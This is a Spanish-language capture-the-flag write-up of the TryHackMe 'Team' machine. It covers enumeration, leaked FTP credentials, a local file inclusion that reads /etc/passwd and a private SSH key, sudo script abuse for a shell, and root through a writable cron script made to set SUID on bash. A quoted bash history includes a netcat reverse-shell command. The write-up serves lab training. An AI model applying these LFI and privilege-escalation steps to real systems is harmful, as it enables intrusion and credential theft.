This page looks best with JavaScript enabled

TryHackMe - Team

 ·  ☕ 12 min read  ·  ✍️ sckull

Team es una maquina de TryHackMe, encontramos credenciales en el servicio FTP que nos llevaron a un nuevo subdominio donde descubrimos un LFI para luego enumerar los archivos y encontrar una clave privada para acceder por SSH. Cambiamos al siguiente usuario tras ejecutar un script en bash. Escalamos privilegios editando un ficher utilizado por un CronJob.

Room

Titulo Team box_img_maker
Descripción Beginner friendly boot2root machine
Puntos 60
Dificultad Facil
Maker

dalemazza

NMAP

Escaneo de puertos con nmap nos muestra el puerto ftp (21), http (80) y el puerto ssh (22) abiertos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
 Nmap 7.91 scan initiated Tue Mar 23 02:30:37 2021 as: nmap -p- --min-rate 10000 -oN allports 10.10.65.146
Nmap scan report for 10.10.65.146 (10.10.65.146)
Host is up (0.27s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

# Nmap done at Tue Mar 23 02:31:41 2021 -- 1 IP address (1 host up) scanned in 63.96 seconds

# Nmap 7.91 scan initiated Tue Mar 23 02:32:33 2021 as: nmap -p 21,22,80 -sV -sC -oN serviceports 10.10.65.146
Nmap scan report for 10.10.65.146 (10.10.65.146)
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
|   256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_  256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 23 02:32:51 2021 -- 1 IP address (1 host up) scanned in 18.06 seconds

HTTP

Encontramos en la pagina web el dominio team.thm.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
HTTP/1.1 200 OK
Date: Tue, 23 Mar 2021 06:36:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sat, 16 Jan 2021 14:11:21 GMT
ETag: "2c66-5b90510390674"
Accept-Ranges: bytes
Content-Length: 11366
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <!--
    Modified from the Debian original for Ubuntu
    Last updated: 2014-03-19
    See: https://launchpad.net/bugs/1288690
  -->
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Apache2 Ubuntu Default Page: It works! If you see this add 'team.thm' to your hosts!</title>
    <style type="text/css" media="screen">
  * {
    margin: 0px 0px 0px 0px;
    padding: 0px 0px 0px 0px;
  } 

GOBUSTER

Realizamos una enumeracion a la pagina del dominio encontrado, vemos la carpeta /script/ y /assets/, a las cuales se realizó una enumeracion recursiva.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#team.thm
/assets (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/scripts (Status: 301)
/server-status (Status: 403)

#team.thm/assets/
/css (Status: 301)
/fonts (Status: 301)
/js (Status: 301)

#team.thm/scripts/
/script.txt (Status: 200)

Encotramos un archivo de texto el cual contiene lo que pareciera ser un script para un “servidor” ftp. Además contiene un comentario en el que indica que existe el mismo archivo con una extension diferente y que contiene credenciales en este.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://team.thm/scripts/script.txt
#!/bin/bash
read -p "Enter Username: " REDACTED
read -sp "Enter Username Password: " REDACTED
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit

# Updated version of the script
# Note to self had to change the extension of the old "script" in this folder, as it has creds in

WFUZZ

Realizamos una enumeracion de extensiones utilizando WFUZZ con un wordlist de extensiones.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ wfuzz -c -w fuzz.txt --sc 200 http://team.thm/scripts/script.FUZZ 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://team.thm/scripts/script.FUZZ
Total requests: 4833

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                      
=====================================================================

000003247:   200        18 L     44 W       466 Ch   "old"

Total time: 0
Processed Requests: 4833
Filtered Requests: 4832
Requests/sec.: 0

Encontramos la extension .old. En el archivo encontramos un usuario y contraseña del servicio ftp.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://team.thm/scripts/script.old          
#!/bin/bash
read -p "Enter Username: " ftpuser
read -sp "Enter Username Password: " T3@m$h@r3
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in $ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit

FTP

Ingresamos al servicio FTP con las credenciales encontradas. Vemos un archivo el cual contiene una nota del usuario Dale, el cual indica que hay una pagina web PHP en desarrollo y se encuentra bajo el subdominio .dev, además debemos de colocar nuestra clave ìd_rsa en el archivo de configuracion.

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ cat New_site.txt 
Dale
        I have started coding a new website in PHP for the team to use, this is currently under development. It can be
found at ".dev" within our domain.

Also as per the team policy please make a copy of your "id_rsa" and place this in the relevent config file.

Gyles 

DEV DALE SITE - LFI

Agregamos a nuestro archivo /etc/hosts el subdominio dev.team.thm. En este subdominio encontramos una pagina que contiene una direccion.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/              
<html>
 <head>
  <title>UNDER DEVELOPMENT</title>
 </head>
 <body>
  Site is being built<a href=script.php?page=teamshare.php </a>
<p>Place holder link to team share</p>
 </body>
</html>

En la direccion o pagina obtiene un parametro en la variable page, despues de modificar el valor encontramos que existe una vulnerabilidad LFI.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=teamshare.php

<html>
 <head>
  <title>Team Share</title>
 </head>
 <body>
  Place holder for future team share </body>
</html>
                                                                                                                                                                                                                                                                                
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=index.php    

<html>
 <head>
  <title>UNDER DEVELOPMENT</title>
 </head>
 <body>
  Site is being built<a href=script.php?page=teamshare.php </a>
<p>Place holder link to team share</p>
 </body>
</html>
                                                                                                                                                                                                                                                                                
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/etc/passwd | head 

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

Realizamos la enumeracion de los usuarios con carpeta principal con lo cual logramos obtener nuestra flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/etc/passwd |grep "/home"
                                               
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
dale:x:1000:1000:anon,,,:/home/dale:/bin/bash
gyles:x:1001:1001::/home/gyles:/bin/bash
ftpuser:x:1002:1002::/home/ftpuser:/bin/sh

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/home/dale/user.txt       

THM{[...REDACTED...]}

DALE - USER

Despues de un intento fallido de obtener las claves privadas de los usuarios existentes, utilizamos un wordlist con WFUZZ para enumerar archivos que nos ayuden a obtener acceso a la maquina. Logramos obtener una lista de archivos, con los cuales logramos obtener informacion de la maquina. Realizando una lectura de cada archivo encontramos en el archivo /etc/ssh/sshd_config la clave privada del usuario Dale.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ wfuzz -c -w lfi_paths.txt --hh 1 http://dev.team.thm/script.php?page=FUZZ 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://dev.team.thm/script.php?page=FUZZ
Total requests: 1014

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                      
=====================================================================

000000015:   200        230 L    1119 W     7313 Ch     "/etc/apache2/apache2.conf"
[... REDACTED ...]
000000162:   200        13 L     17 W       383 Ch      "/etc/os-release"                                                                                                            
000000164:   200        16 L     59 W       553 Ch      "/etc/pam.conf"                                                                                                              
000000197:   200        19 L     113 W      736 Ch      "/etc/resolv.conf"                                                                                                           
000000184:   200        28 L     97 W       582 Ch      "/etc/profile"                                                                                                               
000000165:   200        34 L     42 W       1698 Ch     "/etc/passwd"                                                                                                                
000000166:   200        34 L     42 W       1696 Ch     "/etc/passwd-"                                                                                                               
000000219:   200        12 L     70 W       420 Ch      "/etc/security/sepermit.conf"                                                                                                
000000220:   200        66 L     412 W      2180 Ch     "/etc/security/time.conf"                                                                                                    
000000216:   200        74 L     499 W      2973 Ch     "/etc/security/pam_env.conf"                                                                                                 
000000214:   200        29 L     217 W      1441 Ch     "/etc/security/namespace.conf"                                                                                               
000000213:   200        57 L     347 W      2151 Ch     "/etc/security/limits.conf"                                                                                                  
000000210:   200        107 L    663 W      3636 Ch     "/etc/security/group.conf"                                                                                                   
000000206:   200        123 L    802 W      4621 Ch     "/etc/security/access.conf"                                                                                                  
000000260:   200        160 L    955 W      5937 Ch     "/etc/vsftpd.conf"                                                                                                           
000000252:   200        5 L      45 W       404 Ch      "/etc/updatedb.conf"                                                                                                         
000000248:   200        2 L      1 W        15 Ch       "/etc/timezone"                                                                                                              
000000246:   200        78 L     339 W      2684 Ch     "/etc/sysctl.conf"                                                                                                           
000000240:   200        169 L    447 W      5990 Ch     "/etc/ssh/sshd_config"                                                                                                       
000000379:   200        59 L     114 W      538 Ch      "/proc/devices"                                                                                                              
[... REDACTED ...]
000000630:   200        89 L     467 W      3029 Ch     "/usr/share/adduser/adduser.conf"                                                                                            

Total time: 0
Processed Requests: 1014
Filtered Requests: 933
Requests/sec.: 0

Utilizamos la clave privada con lo que logramos obtener una shell con el usuario Dale.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/thm/teamcw]
└─$ curl -s http://dev.team.thm/script.php?page=/etc/ssh/sshd_config

[... REDACTED ..]

----BEGIN OPENSSH PRIVATE KEY-----
#b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
#NhAAAAAwEAAQAAAYEAng6KMTH3zm+6rqeQzn5HLBjgruB9k2rX/XdzCr6jvdFLJ+uH4ZVE
[.. REDACTED ..]                                              
#CPFMeoYeUdghftAAAAE3A0aW50LXA0cnJvdEBwYXJyb3QBAgMEBQYH                                                                
#-----END OPENSSH PRIVATE KEY-----

┌──(kali㉿kali)-[~/thm/teamcw]
└─$ ssh -i dale_id_rsa dale@10.10.151.176                                                                                                                                               130 ⨯
Last login: Mon Jan 18 10:51:32 2021
dale@TEAM:~$ whoami; id; pwd
dale
uid=1000(dale) gid=1000(dale) groups=1000(dale),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare),1003(editors)
/home/dale
dale@TEAM:~$

GYLES - USER

Realizamos una pequeña enumeracion y vemos que el usuario actual tiene permisos root mediante sudo ejecutar el script admmin_checks, además tiene permisos de lectura.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
dale@TEAM:~$ sudo -l -l
Matching Defaults entries for dale on TEAM:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dale may run the following commands on TEAM:

Sudoers entry:
    RunAsUsers: gyles
    Options: !authenticate
    Commands:
        /home/gyles/admin_checks
dale@TEAM:~$ ls -lah /home/gyles/admin_checks
-rwxr--r-- 1 gyles editors 399 Jan 15 21:52 /home/gyles/admin_checks
dale@TEAM:~$ groups
dale adm cdrom sudo dip plugdev lxd lpadmin sambashare editors

El script realiza la ejecucion del comando date solo si este se le pasa, en tal caso imprime una fecha y con este crea un archivo.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
dale@TEAM:~$ cat /home/gyles/admin_checks
#!/bin/bash

printf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name  >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error # Pregunta por date
printf "The Date is "
$error 2>/dev/null # Ejecuta date

date_save=$(date "+%F-%H-%M")
cp /var/stats/stats.txt /var/stats/stats-$date_save.bak

printf "Stats have been backed up\n"

Para tomar ventaja de esto pasamos /bin/bash en lugar de date para obtener una shell con el usuario gyles.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
dale@TEAM:~$ sudo -u gyles /home/gyles/admin_checks
Reading stats.
Reading stats..
Enter name of person backing up the data: batman
Enter 'date' to timestamp the file: /bin/bash
The Date is 
whoami;id
gyles
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
which python
which python3
/usr/bin/python3
python3 -c 'import pty; pty.spawn("/bin/bash");'
gyles@TEAM:~$ pwd
/home/dale
gyles@TEAM:~$ cd /home
gyles@TEAM:/home$ cd gyles
gyles@TEAM:/home/gyles$ ls -lah
total 48K
drwxr-xr-x 6 gyles gyles   4.0K Jan 17 19:47 .
drwxr-xr-x 5 root  root    4.0K Jan 15 20:21 ..
-rwxr--r-- 1 gyles editors  399 Jan 15 21:52 admin_checks
-rw------- 1 gyles gyles   5.6K Jan 17 20:34 .bash_history
-rw-r--r-- 1 gyles gyles    220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 gyles gyles   3.7K Apr  4  2018 .bashrc
drwx------ 2 gyles gyles   4.0K Jan 15 21:38 .cache
drwx------ 3 gyles gyles   4.0K Jan 15 21:38 .gnupg
drwxrwxr-x 3 gyles gyles   4.0K Jan 15 21:51 .local
-rw-r--r-- 1 gyles gyles    807 Apr  4  2018 .profile
drwx------ 2 gyles gyles   4.0K Jan 15 21:43 .ssh
-rw-r--r-- 1 gyles gyles      0 Jan 17 15:05 .sudo_as_admin_successful

PRIVILEGE ESCALATION

Realizamos una enumeracion con el usuario Gyles y encontramos en el archivo .bash_history que se estuvieron editando varios scripts y ejecucion de shell inversas. Aparentemente algunos de los archivos son utilizados para restaurar los archivos de las paginas team.thm y dev.team.thm.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
gyles@TEAM:/home/gyles$ cat .bash_history|grep ".sh"
cat /etc/shells
chsh -s /bin/bash
nc 192.168.88.128 -e /bin/bash
nc 192.168.88.128 < /bin/bash

[ .. REDACTED ..]

cat /usr/local/sbin/dev.backup.sh 
cat /usr/local/bin/main_backup.sh
cat /opt/admin_stuff/script.sh 
nano /usr/local/sbin/dev.backup.sh
sudo nano /usr/local/sbin/dev.backup.sh
sudo nano /opt/admin_stuff/script.sh 
diff /usr/local/sbin/dev_backup.sh /usr/local/bin/main_backup.sh 
sudo chmod +x dev_backup.sh 
sudo rm dev.backup.sh 
nano dev_backup.sh 
nano /usr/local/bin/main_backup.sh 

Ejecutamos pspy para verificar si existe un cron para la ejecucion de estos scripts. Observamos que se ejecutan varios scripts: /opt/admin_stuff/script.sh, /usr/local/sbin/dev_backup.sh y /usr/local/bin/main_backup.sh.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
2021/03/23 08:43:01 CMD: UID=0    PID=1569   | /bin/bash /opt/admin_stuff/script.sh 
2021/03/23 08:43:01 CMD: UID=0    PID=1568   | /bin/bash /opt/admin_stuff/script.sh 
2021/03/23 08:43:01 CMD: UID=0    PID=1567   | /usr/sbin/CRON -f 
2021/03/23 08:43:01 CMD: UID=0    PID=1570   | cp -r /var/www/team.thm/assets /var/www/team.thm/images /var/www/team.thm/index.html /var/www/team.thm/robots.txt /var/www/team.thm/scripts /var/backups/www/team.thm/ 
2021/03/23 08:43:01 CMD: UID=0    PID=1571   | /bin/bash /usr/local/sbin/dev_backup.sh 
2021/03/23 08:43:01 CMD: UID=0    PID=1572   | cp -r /var/www/dev.team.thm/index.php /var/www/dev.team.thm/script.php /var/www/dev.team.thm/teamshare.php /var/backups/www/dev/ 
2021/03/23 08:43:48 CMD: UID=0    PID=1573   | ps -e -o pid,ppid,state,command 
2021/03/23 08:44:01 CMD: UID=0    PID=1576   | /bin/bash /usr/local/bin/main_backup.sh 
2021/03/23 08:44:01 CMD: UID=0    PID=1575   | /bin/bash /opt/admin_stuff/script.sh 
2021/03/23 08:44:01 CMD: UID=0    PID=1574   | /usr/sbin/CRON -f 
2021/03/23 08:44:01 CMD: UID=0    PID=1577   | cp -r /var/www/team.thm/assets /var/www/team.thm/images /var/www/team.thm/index.html /var/www/team.thm/robots.txt /var/www/team.thm/scripts /var/backups/www/team.thm/ 

Al verificar los permisos de los scripts vemos que tenemos permisos de lectura, escritura y ejecucion en el archivo /usr/local/bin/main_backup.sh.

1
2
3
4
5
6
7
8
9
gyles@TEAM:/home/gyles$ ls -lah /opt/admin_stuff/script.sh
-rwxr--r-- 1 root root 200 Jan 17 20:38 /opt/admin_stuff/script.sh
gyles@TEAM:/home/gyles$ ls -lah /usr/local/sbin/dev_backup.sh
-rwxr-xr-x 1 root root 64 Jan 17 19:42 /usr/local/sbin/dev_backup.sh
gyles@TEAM:/home/gyles$ ls -lah /usr/local/bin/main_backup.sh
-rwxrwxr-x 1 root admin 65 Jan 17 20:36 /usr/local/bin/main_backup.sh
gyles@TEAM:/home/gyles$ id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
gyles@TEAM:/home/gyles$

Agregamos un comando para que este le de permisos SUID a bash.

1
echo "chmod u+s /bin/bash" >> /usr/local/bin/main_backup.sh

Esperamos a que el cron se ejecute, luego de unos segundos obtiene los permisos.

gyles@TEAM:/home/gyles$ ls -lah /bin/bash
-rwxr-xr-x 1 root root 1.1M Apr  4  2018 /bin/bash
gyles@TEAM:/home/gyles$ echo "chmod u+s /bin/bash" >> /usr/local/bin/main_backup.sh
gyles@TEAM:/home/gyles$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.1M Apr  4  2018 /bin/bash

Ejecutamos bash -p con lo que logramos obtener una shell root y nuestra flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
gyles@TEAM:/home/gyles$ bash -p
bash-4.4# whoami
root
bash-4.4# cd
bash-4.4# whoami; id; pwd
root
uid=1001(gyles) gid=1001(gyles) euid=0(root) groups=1001(gyles),1003(editors),1004(admin)
/home/dale
bash-4.4# cd /root
bash-4.4# ls 
root.txt
bash-4.4# cat root.txt
THM{[... REDACTED ...]}
bash-4.4#
Share on

sckull
WRITTEN BY
sckull
Pentester wannabe

THM: Team